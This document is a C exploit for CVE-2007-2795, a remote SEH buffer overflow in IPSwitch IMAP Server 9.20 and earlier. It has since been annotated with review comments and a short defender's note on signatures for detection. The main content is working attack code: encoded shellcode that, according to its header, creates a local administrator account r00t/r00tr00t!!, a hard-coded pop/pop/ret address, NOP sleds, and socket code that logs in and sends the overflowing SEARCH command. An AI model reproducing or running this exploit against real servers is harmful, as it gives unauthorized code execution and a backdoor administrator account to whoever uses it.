IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit



                                                /* Ipsbitch.cpp vs Ipswitch IMAP 
 * Tested on: Windows 2000 SP4
 * Ref: CVE-2007-2795
 *
 * Author: Dominic Chell &#60;[email protected]&#62;
 * Found this half written on a VM so decided to finish it.
 *
 * Payload adds a local admin account USER=r00t PASS=r00tr00t!!
 *
 */

#include &#34;stdafx.h&#34;
#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;errno.h&#62;
#include &#60;string.h&#62;
#include &#34;winsock2.h&#34;

#pragma comment(lib, &#34;ws2_32&#34;)

/* usage(): prints the banner and the expected argument list to stderr.
 * Function-like macro whose body is a bare block (not do { } while (0)), so
 * the trailing ';' at each call site is an extra empty statement -- harmless
 * here because no call is the body of an unbraced if/else. */
#define usage(){ (void)fprintf(stderr, &#34;Ipsbitch vs Ipswitch IMAP &#60;=v9.20\n(C) dmc &#60;[email protected]&#62;\n\nExample: ipsbitch.exe [ip] [port] [user] [password]\n&#34;);}
/* error(e): prints e to stderr and then executes `return -1` in the CALLER.
 * The hidden return only makes sense inside main(); note that it bypasses
 * cleanup -- nothing in this file calls closesocket() or WSACleanup(). */
#define error(e){ (void)fprintf(stderr,&#34;%s\n&#34;,e); return -1;}

// Payload bytes appended after the SEH overwrite in main().  Per the author's
// header comment they create a local account USER=r00t PASS=r00tr00t!! on the
// target; the bytes are opaque here and that claim cannot be verified from
// this listing.
// Bad Chars = &#39;\x00\x0a\x0d\x0b\x09\x0c\x20&#39; -- bytes the encoder was told to
// avoid: a NUL would stop the strcat() in main(), the others are presumably
// line/whitespace separators for the server's IMAP parser (TODO confirm).
// Encoded with shikata ga nai -- a polymorphic encoder, so detection should
// key on the request shape (an oversized SEARCH argument with long 0x90 runs)
// rather than on these exact bytes.
char shellcode[] =
	&#34;\xda\xd4\x29\xc9\xb8\xb3\xfe\x8b\x54\xd9\x74\x24\xf4\xb1\x32&#34;
	&#34;\x5f\x83\xef\xfc\x31\x47\x14\x03\x47\xa7\x1c\x7e\xa8\x2f\xa4&#34;
	&#34;\x81\x51\xaf\xae\xc7\x6d\x24\xcc\xc2\xf5\x3b\xc2\x46\x4a\x23&#34;
	&#34;\x97\x06\x75\x52\x4c\xf1\xfe\x60\x19\x03\xef\xb9\xdd\x9d\x43&#34;
	&#34;\x3d\x1d\xe9\x9c\xfc\x54\x1f\xa2\x3c\x83\xd4\x9f\x94\x70\x11&#34;
	&#34;\x95\xf1\xf2\x46\x71\xf8\xef\x1f\xf2\xf6\xa4\x54\x5b\x1a\x3a&#34;
	&#34;\x80\xef\x3e\xb7\x57\x1b\xb7\x9b\x73\xdf\x04\x7c\x4d\x29\xea&#34;
	&#34;\xd5\xc9\x5e\xac\xe9\x9a\x21\x3c\x81\xed\xbd\x91\x1e\x65\xb6&#34;
	&#34;\x60\xd8\xf5\x06\x18\x49\x92\x76\x56\x6d\x3d\x1f\xfe\x90\x4b&#34;
	&#34;\xd1\xa9\x93\xab\x8d\x38\x08\x1a\x37\xba\xb5\x42\x98\x59\x16&#34;
	&#34;\xed\x83\xe9\x76\x84\x38\x74\x05\x46\xcd\x46\xd9\xf2\x11\xd4&#34;
	&#34;\x29\xcb\x25\x6a\x7a\x1b\xb2\xab\x5b\x7b\x15\xea\xdf\x3f\x49&#34;
	&#34;\xca\xf9\x9f\xe7\x77\x72\xc0\x9b\x18\x19\x61\x08\x81\xaf\x0e&#34;
	&#34;\xa5\x3d\x70\x90\x21\xd0\x19\x7c\xc3\x59\xae\xf2\x72\xe9\x21&#34;
	&#34;\x81\x07\x31\xcc\x55\xd8\x45\x10\xb9\x59\xe1\x14\xc5\x53&#34;;

// Handler pointer written over the SEH record: 0x75022AC4 as little-endian
// bytes, which the author identifies as a pop/pop/ret in ws2help.dll.  It is a
// hard-coded absolute address, hence tied to the tested Windows 2000 SP4 build
// named in the file header.
char *seh = &#34;\xC4\x2A\x02\x75&#34;;
//ws2help.dll - 0x75022AC4 - pop/pop/ret
// Bytes written over the next-SEH pointer; after the pop/pop/ret they run as
// code: `jmp short +0x10` followed by two NOPs, skipping the handler pointer
// and landing in the NOP sled main() places after it.
char *nextseh = &#34;\xeb\x10\x90\x90&#34;;
// short jmp nop nop

/*
 * Entry point.
 *   argv[1] = target IP (dotted quad), argv[2] = port,
 *   argv[3] = IMAP user, argv[4] = IMAP password (each must be < 15 chars).
 *
 * Flow: build the LOGIN line and the oversized SEARCH line up front, connect,
 * print the banner, send LOGIN, send SELECT INBOX, then send the SEARCH line
 * whose argument (per the naming of seh/nextseh above) overwrites an SEH
 * record on the server.  Server responses are printed but never checked, so
 * the SEARCH is sent regardless of whether LOGIN succeeded.
 *
 * Returns 0 after the final send or on a usage error, -1 via error() on a
 * WSAStartup/socket/send failure, and falls off the end (implicit 0 for
 * main) if select() does not report the socket writable within 3 s.  No
 * path calls closesocket() or WSACleanup().
 *
 * Defender's view: on the wire this is an IMAP "SEARCH BEFORE" whose argument
 * is several hundred bytes consisting mostly of 0x90 -- a shape a
 * protocol-aware IDS can flag independently of the payload bytes.
 */
int main(int argc, char *argv[])
{
	SOCKET s;
	struct fd_set mask;              /* Winsock fd_set for the select() below */
	struct timeval timeout; 
	struct sockaddr_in server;

	char user[20], pass[20];         /* at most 14 chars + NUL are ever stored */
	char payload[2048];              /* the SEARCH line; total well under 2048 bytes */
	char recvbuf[1024];              /* recv() reads at most 200 bytes into it */
	/* NOTE(review): argv[4] is read below, so this guard needs `argc < 5`;
	 * with exactly four arguments argv[4] is the terminating NULL and the
	 * strlen() below dereferences it. */
	if(argc &#60; 4)
	{
		usage();
		return 0;
	}

	/* Both inputs are verified to be < 15 chars, so the strncpy(..., 14) and
	 * the explicit terminators are redundant but safe for the 20-byte buffers. */
	if((strlen(argv[3])&#60;15) && (strlen(argv[4])&#60;15))
	{
		strncpy(user, argv[3], 14);
		strncpy(pass, argv[4], 14);
		user[14] = &#39;\0&#39;;
		pass[14] = &#39;\0&#39;;
	}
	else {
		usage();
		return 0;
	}

	/* inet_addr() already returns network byte order.  htonl() is applied here
	 * and again when filling sin_addr below; the two swaps cancel on a 32-bit
	 * value, so the address that reaches the socket is inet_addr()'s result.
	 * Neither INADDR_NONE (unparseable address) nor a bad/zero port is
	 * detected. */
	int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);;

	fprintf(stderr, &#34;Ipsbitch vs Ipswitch IMAP &#60;=v9.20\n(C) dmc &#60;[email protected]&#62;\n\n&#34;);

	/* "0 LOGIN <user> <pass>\r\n": at most 8 + 14 + 1 + 14 + 2 = 39 bytes,
	 * so the 50-byte buffer cannot overflow. */
	char auth[50];
	memset(auth, 0, sizeof(auth));
	memset(recvbuf, 0, sizeof(recvbuf));
	strcat(auth, &#34;0 LOGIN &#34;);
	strcat(auth, user);
	strcat(auth, &#34; &#34;);
	strcat(auth, pass);
	strcat(auth, &#34;\r\n&#34;);
	strcat(auth, &#34;\0&#34;);              /* appends an empty string: no-op */

	/* Overlong SEARCH argument: 80 NOPs, the four next-SEH bytes, the four
	 * handler bytes, 100 NOPs, the payload, 300 more NOPs, CRLF.  strcat()
	 * stops at the first NUL, which is why the payload encoding above must
	 * avoid 0x00. */
	memset(payload, 0, sizeof(payload));
	strcat(payload, &#34;2 SEARCH BEFORE &#34;);
	for(int i=0; i&#60;80; i++) strcat(payload, &#34;\x90&#34;);
	strcat(payload, nextseh);
	strcat(payload, seh);
	for(int i=0; i&#60;100; i++) strcat(payload, &#34;\x90&#34;);
	strcat(payload, shellcode);
	for(int i=0; i&#60;300; i++) strcat(payload, &#34;\x90&#34;);
	strcat(payload, &#34;\r\n&#34;);

	WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error(&#34;Unable to start WSA&#34;); /* error() returns -1 from main() */

	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET) error(&#34;[*] socket error&#34;);
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ipaddr);  /* second htonl(); see ipaddr above */
	server.sin_port=htons(port);	

	/* WSAConnect()'s return value is ignored; the 3 s select() on the write
	 * set is what decides whether to continue. */
	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

	/* If the socket never becomes writable, execution silently reaches the end
	 * of main() with no message printed. */
	select(s+1,NULL,&mask,NULL,&timeout);
	if(FD_ISSET(s,&mask))
		{
			fprintf(stderr, &#34;[*] Connecting to IMAP server\n&#34;);
			/* recv() return values are ignored throughout.  Each read is capped
			 * at 200 bytes into the zeroed 1024-byte buffer, so the %s below is
			 * always NUL-terminated. */
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Got banner:\n%s\n&#34;, recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			fprintf(stderr, &#34;[*] Authenticating...\n&#34;);
			if (send(s,auth,strlen(auth),0)==SOCKET_ERROR) error(&#34;[*] error sending auth payload&#34;);
			memset(auth, 0, sizeof(auth));
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Received:\n%s\n&#34;, recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			fprintf(stderr, &#34;[*] Sending SELECT command...\n&#34;);
			/* NOTE(review): the error text says "auth payload" but this send is
			 * the SELECT command -- copy-paste leftover. */
			if (send(s,&#34;1 SELECT INBOX\r\n&#34;,strlen(&#34;1 SELECT INBOX\r\n&#34;),0)==SOCKET_ERROR) error(&#34;[*] error sending auth payload&#34;);
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Received:\n%s\n&#34;, recvbuf);
			memset(recvbuf, 0, sizeof(recvbuf));
			/* Second read for the remainder of the SELECT response; the buffer
			 * is not cleared again before returning. */
			Sleep(1000);recv(s,recvbuf,200,0);
			fprintf(stderr, &#34;[*] Received:\n%s\n&#34;, recvbuf);
			fprintf(stderr, &#34;[*] Sending exploit payload...\n&#34;);
			if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) error(&#34;[*] error sending exploit payload&#34;);
			memset(payload, 0, sizeof(payload));  /* plain memset on a non-secret local; tidiness only */
			fprintf(stderr, &#34;[*] Now try USER=r00t PASS=r00tr00t!!\n&#34;);
			return 0;                             /* socket is left open; no WSACleanup() */
		}
}

// milw0rm.com [2009-09-14]